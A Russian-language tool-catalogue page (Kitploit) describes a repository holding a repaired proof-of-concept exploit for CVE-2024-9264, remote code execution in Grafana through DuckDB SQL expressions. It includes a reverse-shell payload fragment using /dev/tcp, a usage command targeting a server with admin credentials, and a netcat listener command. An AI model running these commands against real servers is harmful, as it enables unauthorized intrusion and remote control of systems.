Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-9264-Fixed — Исправленный эксплойт (proof-of-concept) для CVE-2024-9264, критической уязвимости удаленного выполнения кода (RCE) в Grafana через SQL-выражения DuckDB. Выполняет обратную оболочку (reverse shell) с использованием исправленного расширения shellfs и функции writefile(). | Kitploit
Инструменты/GitHubGitHub/exerrdev/cve-2024-9264-fixed
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

Исправленный эксплойт (proof-of-concept) для CVE-2024-9264, критической уязвимости удаленного выполнения кода (RCE) в Grafana через SQL-выражения DuckDB. Выполняет обратную оболочку (reverse shell) с использованием исправленного расширения shellfs и функции writefile().

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛠️ CVE-2024-9264 - Исправленный эксплойт RCE для Grafana

Это исправленная версия proof-of-concept эксплуатации уязвимости CVE-2024-9264, критической уязвимости удаленного выполнения кода в Grafana (через SQL-выражения и DuckDB).

🔗 Оригинальное уведомление: Grafana Security Release
❌ Оригинальный PoC: нерабочий из-за синтаксических ошибок и неправильного использования write_file()
✅ Эта версия работает, протестирована на уязвимом экземпляре Grafana 11.0.0.


✅ Исправления в этой версии

  • ✅ Корректно использует writefile() вместо write_file() (функция DuckDB)
  • ✅ Правильная полезная нагрузка для оболочки с использованием bash -i >& /dev/tcp/...
  • ✅ Обратная оболочка успешно записана и выполнена через расширение shellfs

📦 Требования

  • Экземпляр Grafana с:
    • Бэкендом DuckDB
    • Возможностью выполнить install shellfs from community
  • Слушатель netcat на вашей атакующей машине

🚀 Использование

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

Затем слушайте с помощью:

root@kitploit:~
nc -lvnp 4444

⚠️ Правовое предупреждение

Этот проект предназначен только для образовательных целей.
Не используйте его против целей, на которые у вас нет разрешения тестировать.


✍️ Автор этого исправления

Модифицировано и проверено Exerr — оригинальный PoC от z3k0sec.

Скачать инструмент